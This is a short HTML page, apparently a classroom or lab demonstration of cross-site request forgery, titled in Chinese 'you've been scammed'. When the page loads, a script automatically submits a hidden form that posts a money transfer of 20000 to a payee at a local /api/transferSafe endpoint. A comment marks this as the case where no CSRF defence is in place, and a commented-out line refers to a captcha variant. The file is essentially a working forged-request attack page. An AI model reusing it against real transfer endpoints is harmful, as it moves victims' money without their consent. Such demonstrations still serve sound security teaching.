<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <meta http-equiv="X-UA-Compatible" content="ie=edge" />
    <title>你被骗了</title>
  </head>

  <body>
    <form
      name="sneak"
      action="http://localhost:3000/api/transferSafe"
      method="post"
    >
      <input type="text" name="payee" value="dddd" />
      <input type="text" name="amount" value="20000" />
    </form>
  </body>
  <script>
    window.onload = function () {
      /**
       * 以下语句，每次放开对应的一个即可
       */
      document.sneak.submit(); //没有防御CSRF攻击
      // document.sneak1.submit();   //有验证码的情况
    };
  </script>
</html>
